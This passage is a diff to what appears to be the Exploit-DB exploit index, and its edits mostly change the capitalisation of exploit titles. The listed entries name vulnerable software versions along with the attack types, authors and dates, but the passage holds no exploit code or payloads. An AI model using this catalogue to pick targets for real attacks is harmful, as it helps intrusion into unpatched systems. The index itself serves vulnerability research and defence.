for XOOPS - tribes.php uid Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 -32204,platforms/hardware/webapps/32204.txt,"ZyXEL Router P-660HN-T1A - Login Bypass",2014-03-12,"Michael Grifalconi",hardware,webapps,0 +32204,platforms/hardware/webapps/32204.txt,"ZYXEL Router P-660HN-T1A - Login Bypass",2014-03-12,"Michael Grifalconi",hardware,webapps,0 32205,platforms/windows/local/32205.txt,"Huawei Technologies eSpace Meeting Service 1.0.0.23 - Privilege Escalation",2014-03-12,LiquidWorm,windows,local,0 32282,platforms/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0 32207,platforms/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",php,webapps,80 @@ -29081,7 +29081,7 @@ id,file,description,date,author,platform,type,port 32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 - 'forum/neu.asp' SQL Injection",2008-08-15,U238,asp,webapps,0 32256,platforms/windows/dos/32256.py,"Ipswitch 8.0 - WS_FTP Client Format String",2008-08-17,securfrog,windows,dos,0 32257,platforms/php/webapps/32257.txt,"PromoProducts - 'view_product.php' Multiple SQL Injection",2008-08-15,baltazar,php,webapps,0 -32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 - 'awstats.pl' Cross-Site Scripting",2008-08-18,"Morgan Todd",cgi,webapps,0 +32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 - 'AWStats.pl' Cross-Site Scripting",2008-08-18,"Morgan Todd",cgi,webapps,0 32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 - english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 33409,platforms/php/webapps/33409.txt,"Article Directory - 'login.php' SQL Injection",2009-12-16,"R3d D3v!L",php,webapps,0 32261,platforms/windows/local/32261.rb,"MicroP 0.1.1.1600 - (.mppl) Local Stack Based Buffer Overflow",2014-03-14,"Necmettin COSKUN",windows,local,0 @@ -29112,7 +29112,7 @@ id,file,description,date,author,platform,type,port 32292,platforms/linux/dos/32292.rb,"Ruby 1.9 - REXML Remote Denial Of Service",2008-08-23,"Luka Treiber",linux,dos,0 32293,platforms/php/webapps/32293.txt,"One-News - Multiple Input Validation Vulnerabilities",2008-08-23,suN8Hclf,php,webapps,0 32294,platforms/windows/dos/32294.html,"Microsoft Windows Media Services 'nskey.dll' 4.1 - ActiveX Control Remote Buffer Overflow",2008-08-22,"Jeremy Brown",windows,dos,0 -32295,platforms/php/webapps/32295.txt,"PHP-Ultimate Webboard 2.0 - 'admindel.php' Multiple Input Validation Vulnerabilities",2008-08-25,t0pP8uZz,php,webapps,0 +32295,platforms/php/webapps/32295.txt,"PHP-Ultimate WebBoard 2.0 - 'admindel.php' Multiple Input Validation Vulnerabilities",2008-08-25,t0pP8uZz,php,webapps,0 32296,platforms/php/webapps/32296.txt,"Bluemoon inc. PopnupBlog 3.30 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-25,Lostmon,php,webapps,0 32297,platforms/asp/webapps/32297.txt,"Smart Survey 1.0 - 'surveyresults.asp' Cross-Site Scripting",2008-08-26,"Bug Researchers Group",asp,webapps,0 32298,platforms/php/webapps/32298.txt,"HPSystem Management Homepage (SMH) 2.1.12 - 'message.php' Cross-Site Scripting",2008-08-26,"Luca Carettoni",php,webapps,0 @@ -29219,7 +29219,7 @@ id,file,description,date,author,platform,type,port 32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 - Cookie Authentication Bypass",2008-09-29,Crackers_Child,php,webapps,0 32442,platforms/windows/remote/32442.c,"Nokia PC Suite 7.0 - Remote Buffer Overflow",2008-09-29,Ciph3r,windows,remote,0 32443,platforms/php/webapps/32443.txt,"CAcert - 'analyse.php' Cross-Site Scripting",2008-09-29,"Alexander Klink",php,webapps,0 -32444,platforms/php/webapps/32444.txt,"WordPress MU 1.2/1.3 - 'wp-admin/wpmu-blogs.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-29,"Juan Galiana Lara",php,webapps,0 +32444,platforms/php/webapps/32444.txt,"Wordpress MU 1.2/1.3 - 'wp-admin/wpmu-blogs.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-29,"Juan Galiana Lara",php,webapps,0 32445,platforms/linux/remote/32445.txt,"MySQL 5 - Command Line Client HTML Special Characters HTML Injection",2008-09-30,"Thomas Henlich",linux,remote,0 32446,platforms/linux/local/32446.txt,"Xen 3.3 - XenStore Domain Configuration Data Unsafe Storage",2008-09-30,"Pascal Bouchareine",linux,local,0 32447,platforms/php/webapps/32447.txt,"A4Desk Event Calendar - 'v' Parameter Remote File Inclusion",2008-09-30,Lo$er,php,webapps,0 @@ -29329,7 +29329,7 @@ id,file,description,date,author,platform,type,port 32553,platforms/php/webapps/32553.txt,"phpWebSite 0.9.3 - 'links.php' SQL Injection",2008-10-31,"Beenu Arora",php,webapps,0 32554,platforms/php/webapps/32554.txt,"SpitFire Photo Pro - 'pages.php' SQL Injection",2008-10-31,"Beenu Arora",php,webapps,0 32555,platforms/windows/remote/32555.html,"Opera Web Browser 9.62 - History Search Input Validation",2008-10-31,NeoCoderz,windows,remote,0 -32556,platforms/multiple/webapps/32556.txt,"Dell SonicWall EMail Security Appliance Application 7.4.5 - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,multiple,webapps,8619 +32556,platforms/multiple/webapps/32556.txt,"Dell SonicWALL EMail Security Appliance Application 7.4.5 - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,multiple,webapps,8619 32557,platforms/ios/webapps/32557.txt,"FTP Drive + HTTP 1.0.4 iOS - Code Execution",2014-03-27,Vulnerability-Lab,ios,webapps,8080 32558,platforms/ios/webapps/32558.txt,"Lazybone Studios WiFi Music 1.0 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,ios,webapps,8080 32559,platforms/ios/webapps/32559.txt,"Easy FileManager 1.1 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,ios,webapps,8080 @@ -29392,7 +29392,7 @@ id,file,description,date,author,platform,type,port 32618,platforms/php/remote/32618.txt,"plexusCMS 0.5 - Cross-Site Scripting / Remote Shell Exploit / Credentials Leak",2014-03-31,neglomaniac,php,remote,0 32619,platforms/ios/webapps/32619.txt,"PhotoWIFI Lite 1.0 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,52789 32620,platforms/ios/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,8080 -32622,platforms/php/webapps/32622.txt,"WordPress Ajax Pagination Plugin 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",php,webapps,80 +32622,platforms/php/webapps/32622.txt,"Wordpress Ajax Pagination Plugin 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",php,webapps,80 32623,platforms/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read (Metasploit)",2014-03-31,"Brandon Perry",multiple,webapps,0 32624,platforms/php/webapps/32624.txt,"PHP JOBWEBSITE PRO - siteadmin/forgot.php adname Parameter SQL Injection",2008-12-01,Pouya_Server,php,webapps,0 32625,platforms/php/webapps/32625.txt,"PHP JOBWEBSITE PRO - siteadmin/forgot.php Multiple Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 @@ -29412,7 +29412,7 @@ id,file,description,date,author,platform,type,port 32639,platforms/php/webapps/32639.txt,"yappa-ng - 'index.php' album Parameter Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0 32640,platforms/php/webapps/32640.txt,"yappa-ng - Query String Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0 32641,platforms/php/webapps/32641.txt,"RevSense 1.0 - SQL Injection / Cross-Site Scripting",2008-12-04,Pouya_Server,php,webapps,0 -32642,platforms/php/webapps/32642.txt,"PHPSTREET Webboard 1.0 - 'show.php' SQL Injection",2008-12-04,"CWH Underground",php,webapps,0 +32642,platforms/php/webapps/32642.txt,"PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection",2008-12-04,"CWH Underground",php,webapps,0 32643,platforms/windows/remote/32643.txt,"PhonerLite 2.14 SIP Soft Phone - SIP Digest Disclosure",2014-04-01,"Jason Ostrom",windows,remote,5060 32644,platforms/php/webapps/32644.txt,"AlienVault 4.5.0 - Authenticated SQL Injection (Metasploit)",2014-04-01,"Brandon Perry",php,webapps,443 32645,platforms/php/webapps/32645.txt,"TWiki 4.x - SEARCH Variable Remote Command Execution",2008-12-06,"Troy Bollinge",php,webapps,0 @@ -29471,9 +29471,9 @@ id,file,description,date,author,platform,type,port 32698,platforms/php/webapps/32698.txt,"SolucionXpressPro - 'main.php' SQL Injection",2009-01-05,Ehsan_Hp200,php,webapps,0 32699,platforms/windows/remote/32699.txt,"Google Chrome 1.0.154.36 - FTP Client PASV Port Scan Information Disclosure",2009-01-05,"Aditya K Sood",windows,remote,0 32700,platforms/linux/local/32700.rb,"ibstat $PATH - Privilege Escalation",2014-04-04,Metasploit,linux,local,0 -32701,platforms/php/webapps/32701.txt,"WordPress XCloner Plugin 3.1.0 - Cross-Site Request Forgery",2014-04-04,"High-Tech Bridge SA",php,webapps,80 -32702,platforms/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2(build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80 -32703,platforms/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent",2014-04-05,Vulnerability-Lab,ios,webapps,0 +32701,platforms/php/webapps/32701.txt,"Wordpress XCloner Plugin 3.1.0 - Cross-Site Request Forgery",2014-04-04,"High-Tech Bridge SA",php,webapps,80 +32702,platforms/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2 (build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80 +32703,platforms/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Exploit",2014-04-05,Vulnerability-Lab,ios,webapps,0 32704,platforms/windows/dos/32704.pl,"MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service (DOS)",2014-04-05,LiquidWorm,windows,dos,0 32706,platforms/windows/dos/32706.txt,"Notepad++ DSpellCheck 1.2.12.0 - Denial of Service",2014-04-06,sajith,windows,dos,0 32707,platforms/windows/dos/32707.txt,"InfraRecorder 0.53 - Memory Corruption [Denial of Service]",2014-04-06,sajith,windows,dos,0 @@ -29517,7 +29517,7 @@ id,file,description,date,author,platform,type,port 32751,platforms/linux/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",linux,local,0 32752,platforms/windows/local/32752.rb,"WinRAR - Filename Spoofing",2014-04-08,Metasploit,windows,local,0 32753,platforms/hardware/remote/32753.rb,"Fritz!Box Webcm - Unauthenticated Command Injection",2014-04-08,Metasploit,hardware,remote,0 -32754,platforms/osx/dos/32754.c,"MacOS X 10.9 - Hard Link Memory Corruption",2014-04-08,"Maksymilian Arciemowicz",osx,dos,0 +32754,platforms/osx/dos/32754.c,"Mac OSX 10.9 - Hard Link Memory Corruption",2014-04-08,"Maksymilian Arciemowicz",osx,dos,0 32755,platforms/windows/dos/32755.c,"WFTPD Pro 3.30 - Multiple Command Remote Denial of Service Vulnerabilities",2009-01-26,LiquidWorm,windows,dos,0 32756,platforms/asp/webapps/32756.txt,"LDF - 'login.asp' SQL Injection",2009-01-26,"Arash Setayeshi",asp,webapps,0 32757,platforms/php/webapps/32757.txt,"ConPresso CMS 4.07 - Multiple Remote Vulnerabilities",2009-01-26,"David Vieira-Kurz",php,webapps,0 @@ -29586,7 +29586,7 @@ id,file,description,date,author,platform,type,port 32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow",2009-02-27,"musashi karak0rsan",windows,dos,0 32825,platforms/linux/remote/32825.txt,"djbdns 1.05 - Long Response Packet Remote Cache Poisoning",2009-02-27,"Matthew Dempsky",linux,remote,0 32826,platforms/windows/remote/32826.html,"iDefense COMRaider - ActiveX Control 'write()' Arbitrary File Overwrite",2009-03-02,"Amir Zangeneh",windows,remote,0 -32813,platforms/osx/local/32813.c,"Apple Mac OS X Lion Kernel xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation",2014-04-11,"Kenzley Alphonse",osx,local,0 +32813,platforms/osx/local/32813.c,"Apple Mac OSX Lion Kernel xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation",2014-04-11,"Kenzley Alphonse",osx,local,0 32827,platforms/php/webapps/32827.txt,"Afian - 'includer.php' Directory Traversal",2009-03-02,vnbrain.net,php,webapps,0 32828,platforms/php/webapps/32828.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-03-02,Isfahan,php,webapps,0 32829,platforms/linux/local/32829.c,"Linux Kernel 2.6.x - 'seccomp' System Call Security Bypass",2009-03-02,"Chris Evans",linux,local,0 @@ -29621,16 +29621,16 @@ id,file,description,date,author,platform,type,port 32858,platforms/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 - 'error' Parameter Cross-Site Scripting",2009-03-17,syniack,java,webapps,0 32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentication Bypass",2014-04-14,"Yassin Aboukir",hardware,webapps,0 32860,platforms/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 - Duplicate URI Request Denial of Service",2009-03-31,"SCS team",java,dos,0 -32861,platforms/php/webapps/32861.txt,"WordPress Theme LineNity 1.20 - Local File Inclusion",2014-04-14,"felipe andrian",php,webapps,0 +32861,platforms/php/webapps/32861.txt,"Wordpress Theme LineNity 1.20 - Local File Inclusion",2014-04-14,"felipe andrian",php,webapps,0 32862,platforms/java/webapps/32862.txt,"Sun Java System Calendar Server 6 - 'command.shtml' Cross-Site Scripting",2009-03-31,"SCS team",java,webapps,0 32863,platforms/java/webapps/32863.txt,"Sun Java System Communications Express 6.3 - 'search.xml' Cross-Site Scripting",2009-05-20,"SCS team",java,webapps,0 32864,platforms/java/webapps/32864.txt,"Sun Java System Communications Express 6.3 - 'UWCMain' Cross-Site Scripting",2009-05-20,"SCS team",java,webapps,0 32865,platforms/multiple/dos/32865.py,"WhatsApp < 2.11.7 - Remote Crash",2014-04-14,"Jaime Sánchez",multiple,dos,0 32866,platforms/ios/webapps/32866.txt,"PDF Album 1.7 iOS - File Include Web",2014-04-14,Vulnerability-Lab,ios,webapps,0 -32867,platforms/php/webapps/32867.txt,"WordPress Quick Page/Post Redirect Plugin 5.0.3 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 -32868,platforms/php/webapps/32868.txt,"WordPress Twitget Plugin 3.3.1 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 +32867,platforms/php/webapps/32867.txt,"Wordpress Quick Page/Post Redirect Plugin 5.0.3 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 +32868,platforms/php/webapps/32868.txt,"Wordpress Twitget Plugin 3.3.1 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 32869,platforms/linux/webapps/32869.rb,"eScan Web Management Console - Command Injection",2014-04-14,Metasploit,linux,webapps,10080 -32870,platforms/cgi/webapps/32870.txt,"AWStats 6.4 - 'awstats.pl' Multiple Full Path Disclosure",2009-04-19,r0t,cgi,webapps,0 +32870,platforms/cgi/webapps/32870.txt,"AWStats 6.4 - 'AWStats.pl' Multiple Full Path Disclosure",2009-04-19,r0t,cgi,webapps,0 32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 - Avtaar Name HTML Injection",2009-03-22,"Adam Baldwin",php,webapps,0 32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 - 'notepad_body' Parameter SQL Injection",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0 32873,platforms/php/webapps/32873.txt,"PHPCMS2008 - 'ask/search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0 @@ -29714,7 +29714,7 @@ id,file,description,date,author,platform,type,port 32957,platforms/windows/remote/32957.txt,"DWebPro 6.8.26 - Directory Traversal / Arbitrary File Disclosure",2009-04-27,"Alfons Luja",windows,remote,0 32958,platforms/php/webapps/32958.txt,"MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities",2009-04-27,Am!r,php,webapps,0 32959,platforms/windows/remote/32959.rb,"Adobe Flash Player - Regular Expression Heap Overflow",2014-04-21,Metasploit,windows,remote,0 -33337,platforms/osx/dos/33337.c,"Apple Mac OS X 10.5.x - 'ptrace' Mutex Handling Local Denial of Service",2009-11-04,"Micheal Turner",osx,dos,0 +33337,platforms/osx/dos/33337.c,"Apple Mac OSX 10.5.x - 'ptrace' Mutex Handling Local Denial of Service",2009-11-04,"Micheal Turner",osx,dos,0 32960,platforms/php/webapps/32960.txt,"Invision Power Board 3.0 - Multiple HTML Injection / Information Disclosure Vulnerabilities",2009-04-27,brain[pillow],php,webapps,0 32961,platforms/linux/dos/32961.html,"Mozilla Firefox 3.0.9 - 'nsTextFrame::ClearTextRun()' Remote Memory Corruption",2009-04-27,"Marc Gueury",linux,dos,0 32962,platforms/cgi/remote/32962.txt,"LevelOne AMG-2000 2.00.00 - Security Bypass",2009-04-29,J.Greil,cgi,remote,0 @@ -29738,7 +29738,7 @@ id,file,description,date,author,platform,type,port 32979,platforms/multiple/remote/32979.txt,"Glassfish Enterprise Server 2.1 - Admin Console /webService/webServicesGeneral.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 32980,platforms/multiple/remote/32980.txt,"Glassfish Enterprise Server 2.1 - Admin Console /configuration/auditModuleEdit.jsf name Parameter Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 32981,platforms/multiple/remote/32981.txt,"Glassfish Enterprise Server 2.1 - Admin Console /resourceNode/jdbcResourceEdit.jsf name Parameter Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 -34148,platforms/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent",2014-07-23,Vulnerability-Lab,multiple,webapps,0 +34148,platforms/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Exploit",2014-07-23,Vulnerability-Lab,multiple,webapps,0 32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - (sorter.php sorter_value parameter) SQL Injection",2014-04-22,chapp,php,webapps,80 32985,platforms/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 - 'item.php' Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32986,platforms/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 @@ -29757,7 +29757,7 @@ id,file,description,date,author,platform,type,port 33000,platforms/php/webapps/33000.txt,"Cacti 0.8.7 - 'data_input.php' Cross-Site Scripting",2009-05-15,fgeek,php,webapps,0 33001,platforms/php/webapps/33001.ssh,"Kingsoft Webshield 1.1.0.62 - Cross-Site Scripting / Remote Command Execution",2009-05-20,inking,php,webapps,0 33002,platforms/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 - Web Application Firewall Security Bypass",2009-05-20,EnableSecurity,php,webapps,0 -33003,platforms/php/webapps/33003.txt,"WordPress Work-The-Flow Plugin 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,php,webapps,80 +33003,platforms/php/webapps/33003.txt,"Wordpress Work-The-Flow Plugin 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,php,webapps,80 33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 - (dompdf.php read parameter) Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 33005,platforms/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",php,webapps,80 33006,platforms/php/webapps/33006.txt,"AlienVault 4.3.1 - Unauthenticated SQL Injection",2014-04-24,"Sasha Zivojinovic",php,webapps,443 @@ -29827,7 +29827,7 @@ id,file,description,date,author,platform,type,port 33072,platforms/php/webapps/33072.txt,"Adem 0.5.1 - Local File Inclusion",2014-04-28,JIKO,php,webapps,80 33073,platforms/linux/dos/33073.c,"NTP ntpd monlist Query Reflection - Denial of Service",2014-04-28,"Danilo PC",linux,dos,123 33075,platforms/php/webapps/33075.txt,"GeoCore MAX DB Ver. 7.3.3 - Time-Based Blind Injection",2014-04-28,Esac,php,webapps,80 -33076,platforms/php/webapps/33076.txt,"WordPress iMember360 Plugin 3.8.012 < 3.9.001 - Multiple Vulnerabilities",2014-04-28,"Everett Griffiths",php,webapps,80 +33076,platforms/php/webapps/33076.txt,"Wordpress iMember360 Plugin 3.8.012 < 3.9.001 - Multiple Vulnerabilities",2014-04-28,"Everett Griffiths",php,webapps,80 33078,platforms/multiple/remote/33078.txt,"HP ProCurve Threat Management Services - zl ST.1.0.090213 Module CRL Security Bypass",2009-06-13,anonymous,multiple,remote,0 33079,platforms/multiple/remote/33079.txt,"Oracle Weblogic Server 10.3 - 'console-help.portal' Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",multiple,remote,0 33080,platforms/multiple/dos/33080.txt,"Oracle 11.1 - Database Network Foundation Heap Memory Corruption",2009-06-14,"Dennis Yurichev",multiple,dos,0 @@ -29884,7 +29884,7 @@ id,file,description,date,author,platform,type,port 33127,platforms/php/webapps/33127.txt,"Miniweb 2.0 Site Builder Module - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,Moudi,php,webapps,0 40080,platforms/php/webapps/40080.txt,"Tiki Wiki CMS 15.0 - Arbitrary File Download",2016-07-11,"Kacper Szurek",php,webapps,80 40081,platforms/cgi/webapps/40081.py,"Belkin Router AC1200 Firmware 1.00.27 - Authentication Bypass",2016-07-11,"Gregory Smiley",cgi,webapps,80 -40082,platforms/php/webapps/40082.txt,"WordPress All in One SEO Pack Plugin 2.3.6.1 - Persistent Cross-Site Scripting",2016-07-11,"David Vaartjes",php,webapps,80 +40082,platforms/php/webapps/40082.txt,"Wordpress All in One SEO Pack Plugin 2.3.6.1 - Persistent Cross-Site Scripting",2016-07-11,"David Vaartjes",php,webapps,80 33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 - category.php cat Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 33130,platforms/php/webapps/33130.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (1)",2009-06-30,"Ivan Sanchez",php,webapps,0 33131,platforms/php/webapps/33131.txt,"XOOPS 2.3.3 - 'op' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-06-30,"Sense of Security",php,webapps,0 @@ -29975,7 +29975,7 @@ id,file,description,date,author,platform,type,port 33224,platforms/linux/dos/33224.txt,"Wireshark 1.2.1 - GSM A RR Dissector packet.c Unspecified Remote Denial of Service",2009-09-15,"Buildbot Builder",linux,dos,0 33225,platforms/windows/dos/33225.html,"EasyMail Objects 6.0.2.0 - 'emimap4.dll' ActiveX Control Remote Code Execution",2009-09-15,"Francis Provencher",windows,dos,0 33226,platforms/php/webapps/33226.txt,"Mega File Hosting Script 1.2 - 'emaillinks.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 -33227,platforms/php/webapps/33227.txt,"TuttoPHP Morris Guestbook - 'view.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 +33227,platforms/php/webapps/33227.txt,"TuttoPHP Morris GuestBook - 'view.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 33228,platforms/linux/dos/33228.txt,"Linux Kernel 2.6.31 - 'perf_counter_open()' Local Buffer Overflow",2009-09-16,"Xiao Guangrong",linux,dos,0 33229,platforms/bsd/local/33229.c,"NetBSD 5.0.1 - 'IRET' General Protection Fault Handling Privilege Escalation",2009-09-16,"Tavis Ormandy",bsd,local,0 33230,platforms/linux/dos/33230.txt,"GNU glibc 2.x - 'strfmon()' Function Integer Overflow",2009-09-17,"Maksymilian Arciemowicz",linux,dos,0 @@ -30017,7 +30017,7 @@ id,file,description,date,author,platform,type,port 33268,platforms/asp/webapps/33268.html,"AfterLogic WebMail Pro 4.7.10 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,"Sébastien Duquette",asp,webapps,0 33269,platforms/linux/dos/33269.txt,"Dopewars Server 1.5.12 - 'REQUESTJET' Message Remote Denial of Service",2009-10-15,"Doug Prostko",linux,dos,0 33270,platforms/windows/remote/33270.txt,"Microsoft Internet Explorer 5.0.1 - 'deflate' HTTP Content Encoding Remote Code Execution",2009-10-13,Skylined,windows,remote,0 -33271,platforms/windows/dos/33271.py,"VMware Player and Workstation 6.5.3 - 'vmware-authd' Remote Denial of Service",2009-10-07,shinnai,windows,dos,0 +33271,platforms/windows/dos/33271.py,"VMware Player and Workstation 6.5.3 - 'VMware-authd' Remote Denial of Service",2009-10-07,shinnai,windows,dos,0 33272,platforms/windows/remote/33272.txt,"Autodesk 3ds - Max Application Callbacks Arbitrary Command Execution",2009-10-23,"Sebastian Tello",windows,remote,0 33264,platforms/windows/remote/33264.txt,"Microsoft Internet Explorer 8 - X.509 Certificate Common Name Encoding Multiple Security Bypass Vulnerabilities",2009-08-05,"Dan Kaminsky",windows,remote,0 33273,platforms/windows/remote/33273.scn,"Autodesk Softimage 7.0 Scene - .TOC File Remote Code Execution",2009-11-23,"Diego Juarez",windows,remote,0 @@ -30093,17 +30093,17 @@ id,file,description,date,author,platform,type,port 33362,platforms/php/webapps/33362.txt,"CubeCart 3.0.4/4.3.6 - 'productId' Parameter SQL Injection",2009-11-19,"Sangte Amtham",php,webapps,0 33363,platforms/multiple/remote/33363.txt,"Opera Web Browser 10.01 - 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",multiple,remote,0 33364,platforms/linux/remote/33364.txt,"KDE 4.3.3 - KDELibs 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",linux,remote,0 -33365,platforms/php/webapps/33365.txt,"WordPress WP-PHPList Plugin 2.10.2 - 'unsubscribeemail' Parameter Cross-Site Scripting",2009-11-29,MustLive,php,webapps,0 -33366,platforms/php/webapps/33366.txt,"WordPress Trashbin Plugin 0.1 - 'mtb_undelete' Parameter Cross-Site Scripting",2009-11-15,MustLive,php,webapps,0 -33367,platforms/php/webapps/33367.txt,"FireStats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,php,webapps,0 -33368,platforms/php/webapps/33368.html,"FireStats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,php,webapps,0 +33365,platforms/php/webapps/33365.txt,"Wordpress WP-phpList Plugin 2.10.2 - 'unsubscribeemail' Parameter Cross-Site Scripting",2009-11-29,MustLive,php,webapps,0 +33366,platforms/php/webapps/33366.txt,"Wordpress Trashbin Plugin 0.1 - 'mtb_undelete' Parameter Cross-Site Scripting",2009-11-15,MustLive,php,webapps,0 +33367,platforms/php/webapps/33367.txt,"FireStats Wordpress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,php,webapps,0 +33368,platforms/php/webapps/33368.html,"FireStats Wordpress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,php,webapps,0 33370,platforms/multiple/webapps/33370.html,"ElasticSearch - Remote Code Execution",2014-05-15,"Jeff Geiger",multiple,webapps,0 -33371,platforms/php/webapps/33371.txt,"WordPress WP-Cumulus Plugin 1.x - 'tagcloud.swf' Cross-Site Scripting",2009-11-09,MustLive,php,webapps,0 -33372,platforms/php/webapps/33372.html,"Fuctweb CapCC Plugin 1.0 for WordPress CAPTCHA - Security Bypass",2009-11-13,MustLive,php,webapps,0 -33373,platforms/php/webapps/33373.txt,"Subscribe to Comments 2.0 WordPress Plugin - Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,MustLive,php,webapps,0 +33371,platforms/php/webapps/33371.txt,"Wordpress WP-Cumulus Plugin 1.x - 'tagcloud.swf' Cross-Site Scripting",2009-11-09,MustLive,php,webapps,0 +33372,platforms/php/webapps/33372.html,"Fuctweb CapCC Plugin 1.0 for Wordpress CAPTCHA - Security Bypass",2009-11-13,MustLive,php,webapps,0 +33373,platforms/php/webapps/33373.txt,"Subscribe to Comments 2.0 Wordpress Plugin - Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,MustLive,php,webapps,0 33374,platforms/php/webapps/33374.txt,"Cacti 0.8.x - graph.php Multiple Parameter Cross-Site Scripting",2009-11-21,"Moritz Naumann",php,webapps,0 33375,platforms/php/webapps/33375.txt,"Quick.Cart 3.4 / Quick.CMS 2.4 - Delete Function Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",php,webapps,0 -33376,platforms/php/webapps/33376.pl,"klinza professional CMS 5.0.1 - 'menulast.php' Local File Inclusion",2009-11-24,klinza,php,webapps,0 +33376,platforms/php/webapps/33376.pl,"klinza Professional CMS 5.0.1 - 'menulast.php' Local File Inclusion",2009-11-24,klinza,php,webapps,0 33377,platforms/php/webapps/33377.txt,"Joomla! ProofReader 1.0 RC9 Component - Cross-Site Scripting",2009-11-16,MustLive,php,webapps,0 33378,platforms/php/webapps/33378.txt,"Joomla! 1.5.x - 404 Error Page Cross-Site 